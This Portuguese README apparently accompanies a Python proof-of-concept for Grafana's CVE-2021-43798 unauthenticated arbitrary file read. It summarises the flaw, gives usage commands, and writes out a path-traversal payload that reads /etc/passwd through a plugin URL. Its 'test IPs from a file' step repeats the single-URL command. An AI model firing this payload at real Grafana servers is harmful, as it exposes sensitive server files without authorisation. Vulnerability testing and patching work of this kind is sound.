
POC da vulnerabilidade de leitura arbitrária de arquivos CVE-2021-43798 do Grafana, utilizando o método de detecção de polling de múltiplos plugins, permite especificar uma única URL e ler URLs a partir de um arquivo.
Se o objeto estiver atrás de um proxy reverso, o payload pode ser substituído por este
url1 = url +"/public/plugins/"+str.rstrip(plugins)+"/#/../..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd"
Grafana é uma plataforma de aplicação web de visualização de dados de código aberto e multiplataforma. Depois que o usuário configura a conexão com a fonte de dados, o Grafana pode exibir gráficos de dados e alertas no navegador da web.
O Grafana possui uma vulnerabilidade de leitura arbitrária de arquivos não autenticada. Um atacante, sem autenticação, pode ler arquivos arbitrários no host através desta vulnerabilidade.
CVE: CVE-2021-43798
Componente: Grafana
Tipo de vulnerabilidade: Leitura de arquivos
Impacto: Obtenção de informações sensíveis
Resumo: Um atacante não autenticado pode explorar esta vulnerabilidade para obter arquivos sensíveis do servidor
python3 grafana_fileread.py -u http://localhost:3000
Os dados obtidos podem ser visualizados no arquivo grafana 8.x_fileread_vuln.txt
2. Testar IPs de um arquivo
python3 grafana_fileread.py -u http://localhost:3000

